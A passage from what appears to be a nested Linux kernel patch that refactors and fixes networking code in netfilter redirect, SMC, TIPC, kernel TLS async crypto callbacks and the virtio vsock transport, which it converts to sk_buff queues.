+-	.eval		= nft_redir_ipv4_eval,
++	.eval		= nft_redir_eval,
+ 	.init		= nft_redir_init,
+ 	.destroy	= nft_redir_ipv4_destroy,
+ 	.dump		= nft_redir_dump,
+@@ -147,28 +161,6 @@ static struct nft_expr_type nft_redir_ipv4_type __read_mostly = {
+ };
+ 
+ #ifdef CONFIG_NF_TABLES_IPV6
+-static void nft_redir_ipv6_eval(const struct nft_expr *expr,
+-				struct nft_regs *regs,
+-				const struct nft_pktinfo *pkt)
+-{
+-	struct nft_redir *priv = nft_expr_priv(expr);
+-	struct nf_nat_range2 range;
+-
+-	memset(&range, 0, sizeof(range));
+-	if (priv->sreg_proto_min) {
+-		range.min_proto.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_min]);
+-		range.max_proto.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_max]);
+-		range.flags |= NF_NAT_RANGE_PROTO_SPECIFIED;
+-	}
+-
+-	range.flags |= priv->flags;
+-
+-	regs->verdict.code =
+-		nf_nat_redirect_ipv6(pkt->skb, &range, nft_hook(pkt));
+-}
+-
+ static void
+ nft_redir_ipv6_destroy(const struct nft_ctx *ctx, const struct nft_expr *expr)
+ {
+@@ -179,7 +171,7 @@ static struct nft_expr_type nft_redir_ipv6_type;
+ static const struct nft_expr_ops nft_redir_ipv6_ops = {
+ 	.type		= &nft_redir_ipv6_type,
+ 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_redir)),
+-	.eval		= nft_redir_ipv6_eval,
++	.eval		= nft_redir_eval,
+ 	.init		= nft_redir_init,
+ 	.destroy	= nft_redir_ipv6_destroy,
+ 	.dump		= nft_redir_dump,
+@@ -198,20 +190,6 @@ static struct nft_expr_type nft_redir_ipv6_type __read_mostly = {
+ #endif
+ 
+ #ifdef CONFIG_NF_TABLES_INET
+-static void nft_redir_inet_eval(const struct nft_expr *expr,
+-				struct nft_regs *regs,
+-				const struct nft_pktinfo *pkt)
+-{
+-	switch (nft_pf(pkt)) {
+-	case NFPROTO_IPV4:
+-		return nft_redir_ipv4_eval(expr, regs, pkt);
+-	case NFPROTO_IPV6:
+-		return nft_redir_ipv6_eval(expr, regs, pkt);
+-	}
+-
+-	WARN_ON_ONCE(1);
+-}
+-
+ static void
+ nft_redir_inet_destroy(const struct nft_ctx *ctx, const struct nft_expr *expr)
+ {
+@@ -222,7 +200,7 @@ static struct nft_expr_type nft_redir_inet_type;
+ static const struct nft_expr_ops nft_redir_inet_ops = {
+ 	.type		= &nft_redir_inet_type,
+ 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_redir)),
+-	.eval		= nft_redir_inet_eval,
++	.eval		= nft_redir_eval,
+ 	.init		= nft_redir_init,
+ 	.destroy	= nft_redir_inet_destroy,
+ 	.dump		= nft_redir_dump,
+diff --git a/net/netfilter/xt_REDIRECT.c b/net/netfilter/xt_REDIRECT.c
+index 353ca7801251a..ff66b56a3f97d 100644
+--- a/net/netfilter/xt_REDIRECT.c
++++ b/net/netfilter/xt_REDIRECT.c
+@@ -46,7 +46,6 @@ static void redirect_tg_destroy(const struct xt_tgdtor_param *par)
+ 	nf_ct_netns_put(par->net, par->family);
+ }
+ 
+-/* FIXME: Take multiple ranges --RR */
+ static int redirect_tg4_check(const struct xt_tgchk_param *par)
+ {
+ 	const struct nf_nat_ipv4_multi_range_compat *mr = par->targinfo;
+@@ -65,7 +64,14 @@ static int redirect_tg4_check(const struct xt_tgchk_param *par)
+ static unsigned int
+ redirect_tg4(struct sk_buff *skb, const struct xt_action_param *par)
+ {
+-	return nf_nat_redirect_ipv4(skb, par->targinfo, xt_hooknum(par));
++	const struct nf_nat_ipv4_multi_range_compat *mr = par->targinfo;
++	struct nf_nat_range2 range = {
++		.flags       = mr->range[0].flags,
++		.min_proto   = mr->range[0].min,
++		.max_proto   = mr->range[0].max,
++	};
++
++	return nf_nat_redirect_ipv4(skb, &range, xt_hooknum(par));
+ }
+ 
+ static struct xt_target redirect_tg_reg[] __read_mostly = {
+diff --git a/net/netfilter/xt_recent.c b/net/netfilter/xt_recent.c
+index 7ddb9a78e3fc8..ef93e0d3bee04 100644
+--- a/net/netfilter/xt_recent.c
++++ b/net/netfilter/xt_recent.c
+@@ -561,7 +561,7 @@ recent_mt_proc_write(struct file *file, const char __user *input,
+ {
+ 	struct recent_table *t = pde_data(file_inode(file));
+ 	struct recent_entry *e;
+-	char buf[sizeof("+b335:1d35:1e55:dead:c0de:1715:5afe:c0de")];
++	char buf[sizeof("+b335:1d35:1e55:dead:c0de:1715:255.255.255.255")];
+ 	const char *c = buf;
+ 	union nf_inet_addr addr = {};
+ 	u_int16_t family;
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 4ea41d6e36969..d676119984c09 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -274,7 +274,7 @@ static int __smc_release(struct smc_sock *smc)
+ 
+ 	if (!smc->use_fallback) {
+ 		rc = smc_close_active(smc);
+-		sock_set_flag(sk, SOCK_DEAD);
++		smc_sock_set_flag(sk, SOCK_DEAD);
+ 		sk->sk_shutdown |= SHUTDOWN_MASK;
+ 	} else {
+ 		if (sk->sk_state != SMC_CLOSED) {
+@@ -1710,7 +1710,7 @@ static int smc_clcsock_accept(struct smc_sock *lsmc, struct smc_sock **new_smc)
+ 		if (new_clcsock)
+ 			sock_release(new_clcsock);
+ 		new_sk->sk_state = SMC_CLOSED;
+-		sock_set_flag(new_sk, SOCK_DEAD);
++		smc_sock_set_flag(new_sk, SOCK_DEAD);
+ 		sock_put(new_sk); /* final */
+ 		*new_smc = NULL;
+ 		goto out;
+diff --git a/net/smc/smc.h b/net/smc/smc.h
+index 1d36720fc019c..bcb57e60b2155 100644
+--- a/net/smc/smc.h
++++ b/net/smc/smc.h
+@@ -377,4 +377,9 @@ int smc_nl_dump_hs_limitation(struct sk_buff *skb, struct netlink_callback *cb);
+ int smc_nl_enable_hs_limitation(struct sk_buff *skb, struct genl_info *info);
+ int smc_nl_disable_hs_limitation(struct sk_buff *skb, struct genl_info *info);
+ 
++static inline void smc_sock_set_flag(struct sock *sk, enum sock_flags flag)
++{
++	set_bit(flag, &sk->sk_flags);
++}
++
+ #endif	/* __SMC_H */
+diff --git a/net/smc/smc_cdc.c b/net/smc/smc_cdc.c
+index 89105e95b4523..3c06625ceb200 100644
+--- a/net/smc/smc_cdc.c
++++ b/net/smc/smc_cdc.c
+@@ -28,13 +28,15 @@ static void smc_cdc_tx_handler(struct smc_wr_tx_pend_priv *pnd_snd,
+ {
+ 	struct smc_cdc_tx_pend *cdcpend = (struct smc_cdc_tx_pend *)pnd_snd;
+ 	struct smc_connection *conn = cdcpend->conn;
++	struct smc_buf_desc *sndbuf_desc;
+ 	struct smc_sock *smc;
+ 	int diff;
+ 
++	sndbuf_desc = conn->sndbuf_desc;
+ 	smc = container_of(conn, struct smc_sock, conn);
+ 	bh_lock_sock(&smc->sk);
+-	if (!wc_status) {
+-		diff = smc_curs_diff(cdcpend->conn->sndbuf_desc->len,
++	if (!wc_status && sndbuf_desc) {
++		diff = smc_curs_diff(sndbuf_desc->len,
+ 				     &cdcpend->conn->tx_curs_fin,
+ 				     &cdcpend->cursor);
+ 		/* sndbuf_space is decreased in smc_sendmsg */
+@@ -114,9 +116,6 @@ int smc_cdc_msg_send(struct smc_connection *conn,
+ 	union smc_host_cursor cfed;
+ 	int rc;
+ 
+-	if (unlikely(!READ_ONCE(conn->sndbuf_desc)))
+-		return -ENOBUFS;
+-
+ 	smc_cdc_add_pending_send(conn, pend);
+ 
+ 	conn->tx_cdc_seq++;
+@@ -385,7 +384,7 @@ static void smc_cdc_msg_recv_action(struct smc_sock *smc,
+ 		smc->sk.sk_shutdown |= RCV_SHUTDOWN;
+ 		if (smc->clcsock && smc->clcsock->sk)
+ 			smc->clcsock->sk->sk_shutdown |= RCV_SHUTDOWN;
+-		sock_set_flag(&smc->sk, SOCK_DONE);
++		smc_sock_set_flag(&smc->sk, SOCK_DONE);
+ 		sock_hold(&smc->sk); /* sock_put in close_work */
+ 		if (!queue_work(smc_close_wq, &conn->close_work))
+ 			sock_put(&smc->sk);
+diff --git a/net/smc/smc_close.c b/net/smc/smc_close.c
+index dbdf03e8aa5b5..10219f55aad14 100644
+--- a/net/smc/smc_close.c
++++ b/net/smc/smc_close.c
+@@ -116,7 +116,8 @@ static void smc_close_cancel_work(struct smc_sock *smc)
+ 	struct sock *sk = &smc->sk;
+ 
+ 	release_sock(sk);
+-	cancel_work_sync(&smc->conn.close_work);
++	if (cancel_work_sync(&smc->conn.close_work))
++		sock_put(sk);
+ 	cancel_delayed_work_sync(&smc->conn.tx_work);
+ 	lock_sock(sk);
+ }
+@@ -173,7 +174,7 @@ void smc_close_active_abort(struct smc_sock *smc)
+ 		break;
+ 	}
+ 
+-	sock_set_flag(sk, SOCK_DEAD);
++	smc_sock_set_flag(sk, SOCK_DEAD);
+ 	sk->sk_state_change(sk);
+ 
+ 	if (release_clcsock) {
+diff --git a/net/tipc/link.c b/net/tipc/link.c
+index 2eff1c7949cbc..8715c9b05f90d 100644
+--- a/net/tipc/link.c
++++ b/net/tipc/link.c
+@@ -1446,7 +1446,7 @@ u16 tipc_get_gap_ack_blks(struct tipc_gap_ack_blks **ga, struct tipc_link *l,
+ 		p = (struct tipc_gap_ack_blks *)msg_data(hdr);
+ 		sz = ntohs(p->len);
+ 		/* Sanity check */
+-		if (sz == struct_size(p, gacks, p->ugack_cnt + p->bgack_cnt)) {
++		if (sz == struct_size(p, gacks, size_add(p->ugack_cnt, p->bgack_cnt))) {
+ 			/* Good, check if the desired type exists */
+ 			if ((uc && p->ugack_cnt) || (!uc && p->bgack_cnt))
+ 				goto ok;
+@@ -1533,7 +1533,7 @@ static u16 tipc_build_gap_ack_blks(struct tipc_link *l, struct tipc_msg *hdr)
+ 			__tipc_build_gap_ack_blks(ga, l, ga->bgack_cnt) : 0;
+ 
+ 	/* Total len */
+-	len = struct_size(ga, gacks, ga->bgack_cnt + ga->ugack_cnt);
++	len = struct_size(ga, gacks, size_add(ga->bgack_cnt, ga->ugack_cnt));
+ 	ga->len = htons(len);
+ 	return len;
+ }
+diff --git a/net/tipc/netlink.c b/net/tipc/netlink.c
+index e8fd257c0e688..1a9a5bdaccf4f 100644
+--- a/net/tipc/netlink.c
++++ b/net/tipc/netlink.c
+@@ -88,7 +88,7 @@ const struct nla_policy tipc_nl_net_policy[TIPC_NLA_NET_MAX + 1] = {
+ 
+ const struct nla_policy tipc_nl_link_policy[TIPC_NLA_LINK_MAX + 1] = {
+ 	[TIPC_NLA_LINK_UNSPEC]		= { .type = NLA_UNSPEC },
+-	[TIPC_NLA_LINK_NAME]		= { .type = NLA_STRING,
++	[TIPC_NLA_LINK_NAME]		= { .type = NLA_NUL_STRING,
+ 					    .len = TIPC_MAX_LINK_NAME },
+ 	[TIPC_NLA_LINK_MTU]		= { .type = NLA_U32 },
+ 	[TIPC_NLA_LINK_BROADCAST]	= { .type = NLA_FLAG },
+@@ -125,7 +125,7 @@ const struct nla_policy tipc_nl_prop_policy[TIPC_NLA_PROP_MAX + 1] = {
+ 
+ const struct nla_policy tipc_nl_bearer_policy[TIPC_NLA_BEARER_MAX + 1]	= {
+ 	[TIPC_NLA_BEARER_UNSPEC]	= { .type = NLA_UNSPEC },
+-	[TIPC_NLA_BEARER_NAME]		= { .type = NLA_STRING,
++	[TIPC_NLA_BEARER_NAME]		= { .type = NLA_NUL_STRING,
+ 					    .len = TIPC_MAX_BEARER_NAME },
+ 	[TIPC_NLA_BEARER_PROP]		= { .type = NLA_NESTED },
+ 	[TIPC_NLA_BEARER_DOMAIN]	= { .type = NLA_U32 }
+diff --git a/net/tls/tls.h b/net/tls/tls.h
+index 17737a65c643a..0672acab27731 100644
+--- a/net/tls/tls.h
++++ b/net/tls/tls.h
+@@ -70,6 +70,8 @@ struct tls_rec {
+ 	char content_type;
+ 	struct scatterlist sg_content_type;
+ 
++	struct sock *sk;
++
+ 	char aad_space[TLS_AAD_SPACE_SIZE];
+ 	u8 iv_data[MAX_IV_SIZE];
+ 	struct aead_request aead_req;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 2af72d349192e..2e60bf06adff0 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -38,6 +38,7 @@
+ #include <linux/bug.h>
+ #include <linux/sched/signal.h>
+ #include <linux/module.h>
++#include <linux/kernel.h>
+ #include <linux/splice.h>
+ #include <crypto/aead.h>
+ 
+@@ -57,6 +58,7 @@ struct tls_decrypt_arg {
+ };
+ 
+ struct tls_decrypt_ctx {
++	struct sock *sk;
+ 	u8 iv[MAX_IV_SIZE];
+ 	u8 aad[TLS_MAX_AAD_SIZE];
+ 	u8 tail;
+@@ -179,18 +181,25 @@ static int tls_padding_length(struct tls_prot_info *prot, struct sk_buff *skb,
+ 	return sub;
+ }
+ 
+-static void tls_decrypt_done(struct crypto_async_request *req, int err)
++static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ {
+-	struct aead_request *aead_req = (struct aead_request *)req;
++	struct aead_request *aead_req = crypto_get_completion_data(data);
++	struct crypto_aead *aead = crypto_aead_reqtfm(aead_req);
+ 	struct scatterlist *sgout = aead_req->dst;
+ 	struct scatterlist *sgin = aead_req->src;
+ 	struct tls_sw_context_rx *ctx;
++	struct tls_decrypt_ctx *dctx;
+ 	struct tls_context *tls_ctx;
+ 	struct scatterlist *sg;
+ 	unsigned int pages;
+ 	struct sock *sk;
++	int aead_size;
+ 
+-	sk = (struct sock *)req->data;
++	aead_size = sizeof(*aead_req) + crypto_aead_reqsize(aead);
++	aead_size = ALIGN(aead_size, __alignof__(*dctx));
++	dctx = (void *)((u8 *)aead_req + aead_size);
++
++	sk = dctx->sk;
+ 	tls_ctx = tls_get_ctx(sk);
+ 	ctx = tls_sw_ctx_rx(tls_ctx);
+ 
+@@ -242,7 +251,7 @@ static int tls_do_decryption(struct sock *sk,
+ 	if (darg->async) {
+ 		aead_request_set_callback(aead_req,
+ 					  CRYPTO_TFM_REQ_MAY_BACKLOG,
+-					  tls_decrypt_done, sk);
++					  tls_decrypt_done, aead_req);
+ 		atomic_inc(&ctx->decrypt_pending);
+ 	} else {
+ 		aead_request_set_callback(aead_req,
+@@ -338,6 +347,8 @@ static struct tls_rec *tls_get_rec(struct sock *sk)
+ 	sg_set_buf(&rec->sg_aead_out[0], rec->aad_space, prot->aad_size);
+ 	sg_unmark_end(&rec->sg_aead_out[1]);
+ 
++	rec->sk = sk;
++
+ 	return rec;
+ }
+ 
+@@ -419,22 +430,27 @@ tx_err:
+ 	return rc;
+ }
+ 
+-static void tls_encrypt_done(struct crypto_async_request *req, int err)
++static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ {
+-	struct aead_request *aead_req = (struct aead_request *)req;
+-	struct sock *sk = req->data;
+-	struct tls_context *tls_ctx = tls_get_ctx(sk);
+-	struct tls_prot_info *prot = &tls_ctx->prot_info;
+-	struct tls_sw_context_tx *ctx = tls_sw_ctx_tx(tls_ctx);
++	struct aead_request *aead_req = crypto_get_completion_data(data);
++	struct tls_sw_context_tx *ctx;
++	struct tls_context *tls_ctx;
++	struct tls_prot_info *prot;
+ 	struct scatterlist *sge;
+ 	struct sk_msg *msg_en;
+ 	struct tls_rec *rec;
+ 	bool ready = false;
++	struct sock *sk;
+ 	int pending;
+ 
+ 	rec = container_of(aead_req, struct tls_rec, aead_req);
+ 	msg_en = &rec->msg_encrypted;
+ 
++	sk = rec->sk;
++	tls_ctx = tls_get_ctx(sk);
++	prot = &tls_ctx->prot_info;
++	ctx = tls_sw_ctx_tx(tls_ctx);
++
+ 	sge = sk_msg_elem(msg_en, msg_en->sg.curr);
+ 	sge->offset -= prot->prepend_size;
+ 	sge->length += prot->prepend_size;
+@@ -522,7 +538,7 @@ static int tls_do_encryption(struct sock *sk,
+ 			       data_len, rec->iv_data);
+ 
+ 	aead_request_set_callback(aead_req, CRYPTO_TFM_REQ_MAY_BACKLOG,
+-				  tls_encrypt_done, sk);
++				  tls_encrypt_done, aead_req);
+ 
+ 	/* Add the record in tx_list */
+ 	list_add_tail((struct list_head *)&rec->list, &ctx->tx_list);
+@@ -1495,7 +1511,8 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	 * Both structs are variable length.
+ 	 */
+ 	aead_size = sizeof(*aead_req) + crypto_aead_reqsize(ctx->aead_recv);
+-	mem = kmalloc(aead_size + struct_size(dctx, sg, n_sgin + n_sgout),
++	aead_size = ALIGN(aead_size, __alignof__(*dctx));
++	mem = kmalloc(aead_size + struct_size(dctx, sg, size_add(n_sgin, n_sgout)),
+ 		      sk->sk_allocation);
+ 	if (!mem) {
+ 		err = -ENOMEM;
+@@ -1505,6 +1522,7 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	/* Segment the allocated memory */
+ 	aead_req = (struct aead_request *)mem;
+ 	dctx = (struct tls_decrypt_ctx *)(mem + aead_size);
++	dctx->sk = sk;
+ 	sgin = &dctx->sg[0];
+ 	sgout = &dctx->sg[n_sgin];
+ 
+diff --git a/net/vmw_vsock/virtio_transport.c b/net/vmw_vsock/virtio_transport.c
+index 460e7fbb42da3..16575ea836590 100644
+--- a/net/vmw_vsock/virtio_transport.c
++++ b/net/vmw_vsock/virtio_transport.c
+@@ -42,8 +42,7 @@ struct virtio_vsock {
+ 	bool tx_run;
+ 
+ 	struct work_struct send_pkt_work;
+-	spinlock_t send_pkt_list_lock;
+-	struct list_head send_pkt_list;
++	struct sk_buff_head send_pkt_queue;
+ 
+ 	atomic_t queued_replies;
+ 
+@@ -101,41 +100,31 @@ virtio_transport_send_pkt_work(struct work_struct *work)
+ 	vq = vsock->vqs[VSOCK_VQ_TX];
+ 
+ 	for (;;) {
+-		struct virtio_vsock_pkt *pkt;
+ 		struct scatterlist hdr, buf, *sgs[2];
+ 		int ret, in_sg = 0, out_sg = 0;
++		struct sk_buff *skb;
+ 		bool reply;
+ 
+-		spin_lock_bh(&vsock->send_pkt_list_lock);
+-		if (list_empty(&vsock->send_pkt_list)) {
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++		skb = virtio_vsock_skb_dequeue(&vsock->send_pkt_queue);
++		if (!skb)
+ 			break;
+-		}
+-
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-		spin_unlock_bh(&vsock->send_pkt_list_lock);
+ 
+-		virtio_transport_deliver_tap_pkt(pkt);
++		virtio_transport_deliver_tap_pkt(skb);
++		reply = virtio_vsock_skb_reply(skb);
+ 
+-		reply = pkt->reply;
+-
+-		sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
++		sg_init_one(&hdr, virtio_vsock_hdr(skb), sizeof(*virtio_vsock_hdr(skb)));
+ 		sgs[out_sg++] = &hdr;
+-		if (pkt->buf) {
+-			sg_init_one(&buf, pkt->buf, pkt->len);
++		if (skb->len > 0) {
++			sg_init_one(&buf, skb->data, skb->len);
+ 			sgs[out_sg++] = &buf;
+ 		}
+ 
+-		ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, pkt, GFP_KERNEL);
++		ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, skb, GFP_KERNEL);
+ 		/* Usually this means that there is no more space available in
+ 		 * the vq
+ 		 */
+ 		if (ret < 0) {
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 			break;
+ 		}
+ 
+@@ -164,32 +153,32 @@ out:
+ }
+ 
+ static int
+-virtio_transport_send_pkt(struct virtio_vsock_pkt *pkt)
++virtio_transport_send_pkt(struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr;
+ 	struct virtio_vsock *vsock;
+-	int len = pkt->len;
++	int len = skb->len;
++
++	hdr = virtio_vsock_hdr(skb);
+ 
+ 	rcu_read_lock();
+ 	vsock = rcu_dereference(the_virtio_vsock);
+ 	if (!vsock) {
+-		virtio_transport_free_pkt(pkt);
++		kfree_skb(skb);
+ 		len = -ENODEV;
+ 		goto out_rcu;
+ 	}
+ 
+-	if (le64_to_cpu(pkt->hdr.dst_cid) == vsock->guest_cid) {
+-		virtio_transport_free_pkt(pkt);
++	if (le64_to_cpu(hdr->dst_cid) == vsock->guest_cid) {
++		kfree_skb(skb);
+ 		len = -ENODEV;
+ 		goto out_rcu;
+ 	}
+ 
+-	if (pkt->reply)
++	if (virtio_vsock_skb_reply(skb))
+ 		atomic_inc(&vsock->queued_replies);
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_add_tail(&pkt->list, &vsock->send_pkt_list);
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
++	virtio_vsock_skb_queue_tail(&vsock->send_pkt_queue, skb);
+ 	queue_work(virtio_vsock_workqueue, &vsock->send_pkt_work);
+ 
+ out_rcu:
+@@ -201,9 +190,7 @@ static int
+ virtio_transport_cancel_pkt(struct vsock_sock *vsk)
+ {
+ 	struct virtio_vsock *vsock;
+-	struct virtio_vsock_pkt *pkt, *n;
+ 	int cnt = 0, ret;
+-	LIST_HEAD(freeme);
+ 
+ 	rcu_read_lock();
+ 	vsock = rcu_dereference(the_virtio_vsock);
+@@ -212,20 +199,7 @@ virtio_transport_cancel_pkt(struct vsock_sock *vsk)
+ 		goto out_rcu;
+ 	}
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	list_for_each_entry_safe(pkt, n, &vsock->send_pkt_list, list) {
+-		if (pkt->vsk != vsk)
+-			continue;
+-		list_move(&pkt->list, &freeme);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
+-	list_for_each_entry_safe(pkt, n, &freeme, list) {
+-		if (pkt->reply)
+-			cnt++;
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
++	cnt = virtio_transport_purge_skbs(vsk, &vsock->send_pkt_queue);
+ 
+ 	if (cnt) {
+ 		struct virtqueue *rx_vq = vsock->vqs[VSOCK_VQ_RX];
+@@ -246,38 +220,28 @@ out_rcu:
+ 
+ static void virtio_vsock_rx_fill(struct virtio_vsock *vsock)
+ {
+-	int buf_len = VIRTIO_VSOCK_DEFAULT_RX_BUF_SIZE;
+-	struct virtio_vsock_pkt *pkt;
+-	struct scatterlist hdr, buf, *sgs[2];
++	int total_len = VIRTIO_VSOCK_DEFAULT_RX_BUF_SIZE + VIRTIO_VSOCK_SKB_HEADROOM;
++	struct scatterlist pkt, *p;
+ 	struct virtqueue *vq;
++	struct sk_buff *skb;
+ 	int ret;
+ 
+ 	vq = vsock->vqs[VSOCK_VQ_RX];
+ 
+ 	do {
+-		pkt = kzalloc(sizeof(*pkt), GFP_KERNEL);
+-		if (!pkt)
++		skb = virtio_vsock_alloc_skb(total_len, GFP_KERNEL);
++		if (!skb)
+ 			break;
+ 
+-		pkt->buf = kmalloc(buf_len, GFP_KERNEL);
+-		if (!pkt->buf) {
+-			virtio_transport_free_pkt(pkt);
++		memset(skb->head, 0, VIRTIO_VSOCK_SKB_HEADROOM);
++		sg_init_one(&pkt, virtio_vsock_hdr(skb), total_len);
++		p = &pkt;
++		ret = virtqueue_add_sgs(vq, &p, 0, 1, skb, GFP_KERNEL);
++		if (ret < 0) {
++			kfree_skb(skb);
+ 			break;
+ 		}
+ 
+-		pkt->buf_len = buf_len;
+-		pkt->len = buf_len;
+-
+-		sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
+-		sgs[0] = &hdr;
+-
+-		sg_init_one(&buf, pkt->buf, buf_len);
+-		sgs[1] = &buf;
+-		ret = virtqueue_add_sgs(vq, sgs, 0, 2, pkt, GFP_KERNEL);
+-		if (ret) {
+-			virtio_transport_free_pkt(pkt);
+-			break;
+-		}
+ 		vsock->rx_buf_nr++;
+ 	} while (vq->num_free);
+ 	if (vsock->rx_buf_nr > vsock->rx_buf_max_nr)
+@@ -299,12 +263,12 @@ static void virtio_transport_tx_work(struct work_struct *work)
+ 		goto out;
+ 
+ 	do {
+-		struct virtio_vsock_pkt *pkt;
++		struct sk_buff *skb;
+ 		unsigned int len;
+ 
+ 		virtqueue_disable_cb(vq);
+-		while ((pkt = virtqueue_get_buf(vq, &len)) != NULL) {
+-			virtio_transport_free_pkt(pkt);
++		while ((skb = virtqueue_get_buf(vq, &len)) != NULL) {
++			consume_skb(skb);
+ 			added = true;
+ 		}
+ 	} while (!virtqueue_enable_cb(vq));
+@@ -529,7 +493,7 @@ static void virtio_transport_rx_work(struct work_struct *work)
+ 	do {
+ 		virtqueue_disable_cb(vq);
+ 		for (;;) {
+-			struct virtio_vsock_pkt *pkt;
++			struct sk_buff *skb;
+ 			unsigned int len;
+ 
+ 			if (!virtio_transport_more_replies(vsock)) {
+@@ -540,23 +504,22 @@ static void virtio_transport_rx_work(struct work_struct *work)
+ 				goto out;
+ 			}
+ 
+-			pkt = virtqueue_get_buf(vq, &len);
+-			if (!pkt) {
++			skb = virtqueue_get_buf(vq, &len);
++			if (!skb)
+ 				break;
+-			}
+ 
+ 			vsock->rx_buf_nr--;
+ 
+ 			/* Drop short/long packets */
+-			if (unlikely(len < sizeof(pkt->hdr) ||
+-				     len > sizeof(pkt->hdr) + pkt->len)) {
+-				virtio_transport_free_pkt(pkt);
++			if (unlikely(len < sizeof(struct virtio_vsock_hdr) ||
++				     len > virtio_vsock_skb_len(skb))) {
++				kfree_skb(skb);
+ 				continue;
+ 			}
+ 
+-			pkt->len = len - sizeof(pkt->hdr);
+-			virtio_transport_deliver_tap_pkt(pkt);
+-			virtio_transport_recv_pkt(&virtio_transport, pkt);
++			virtio_vsock_skb_rx_put(skb);
++			virtio_transport_deliver_tap_pkt(skb);
++			virtio_transport_recv_pkt(&virtio_transport, skb);
+ 		}
+ 	} while (!virtqueue_enable_cb(vq));
+ 
+@@ -624,7 +587,7 @@ static void virtio_vsock_vqs_start(struct virtio_vsock *vsock)
+ static void virtio_vsock_vqs_del(struct virtio_vsock *vsock)
+ {
+ 	struct virtio_device *vdev = vsock->vdev;
+-	struct virtio_vsock_pkt *pkt;
++	struct sk_buff *skb;
+ 
+ 	/* Reset all connected sockets when the VQs disappear */
+ 	vsock_for_each_connected_socket(&virtio_transport.transport,
+@@ -651,23 +614,16 @@ static void virtio_vsock_vqs_del(struct virtio_vsock *vsock)
+ 	virtio_reset_device(vdev);
+ 
+ 	mutex_lock(&vsock->rx_lock);
+-	while ((pkt = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_RX])))
+-		virtio_transport_free_pkt(pkt);
++	while ((skb = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_RX])))
++		kfree_skb(skb);
+ 	mutex_unlock(&vsock->rx_lock);
+ 
+ 	mutex_lock(&vsock->tx_lock);
+-	while ((pkt = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_TX])))
+-		virtio_transport_free_pkt(pkt);
++	while ((skb = virtqueue_detach_unused_buf(vsock->vqs[VSOCK_VQ_TX])))
++		kfree_skb(skb);
+ 	mutex_unlock(&vsock->tx_lock);
+ 
+-	spin_lock_bh(&vsock->send_pkt_list_lock);
+-	while (!list_empty(&vsock->send_pkt_list)) {
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del(&pkt->list);
+-		virtio_transport_free_pkt(pkt);
+-	}
+-	spin_unlock_bh(&vsock->send_pkt_list_lock);
++	virtio_vsock_skb_queue_purge(&vsock->send_pkt_queue);
+ 
+ 	/* Delete virtqueues and flush outstanding callbacks if any */
+ 	vdev->config->del_vqs(vdev);
+@@ -704,8 +660,7 @@ static int virtio_vsock_probe(struct virtio_device *vdev)
+ 	mutex_init(&vsock->tx_lock);
+ 	mutex_init(&vsock->rx_lock);
+ 	mutex_init(&vsock->event_lock);
+-	spin_lock_init(&vsock->send_pkt_list_lock);
+-	INIT_LIST_HEAD(&vsock->send_pkt_list);
++	skb_queue_head_init(&vsock->send_pkt_queue);
+ 	INIT_WORK(&vsock->rx_work, virtio_transport_rx_work);
+ 	INIT_WORK(&vsock->tx_work, virtio_transport_tx_work);
+ 	INIT_WORK(&vsock->event_work, virtio_transport_event_work);
+diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
+index a9980e9b93040..79e79fd6efd19 100644
+--- a/net/vmw_vsock/virtio_transport_common.c
++++ b/net/vmw_vsock/virtio_transport_common.c
+@@ -37,53 +37,58 @@ virtio_transport_get_ops(struct vsock_sock *vsk)
+ 	return container_of(t, struct virtio_transport, transport);
+ }
+ 
+-static struct virtio_vsock_pkt *
+-virtio_transport_alloc_pkt(struct virtio_vsock_pkt_info *info,
++/* Returns a new packet on success, otherwise returns NULL.
++ *
++ * If NULL is returned, errp is set to a negative errno.
++ */
++static struct sk_buff *
++virtio_transport_alloc_skb(struct virtio_vsock_pkt_info *info,
+ 			   size_t len,
+ 			   u32 src_cid,
+ 			   u32 src_port,
+ 			   u32 dst_cid,
+ 			   u32 dst_port)
+ {
+-	struct virtio_vsock_pkt *pkt;
++	const size_t skb_len = VIRTIO_VSOCK_SKB_HEADROOM + len;
++	struct virtio_vsock_hdr *hdr;
++	struct sk_buff *skb;
++	void *payload;
+ 	int err;
+ 
+-	pkt = kzalloc(sizeof(*pkt), GFP_KERNEL);
+-	if (!pkt)
++	skb = virtio_vsock_alloc_skb(skb_len, GFP_KERNEL);
++	if (!skb)
+ 		return NULL;
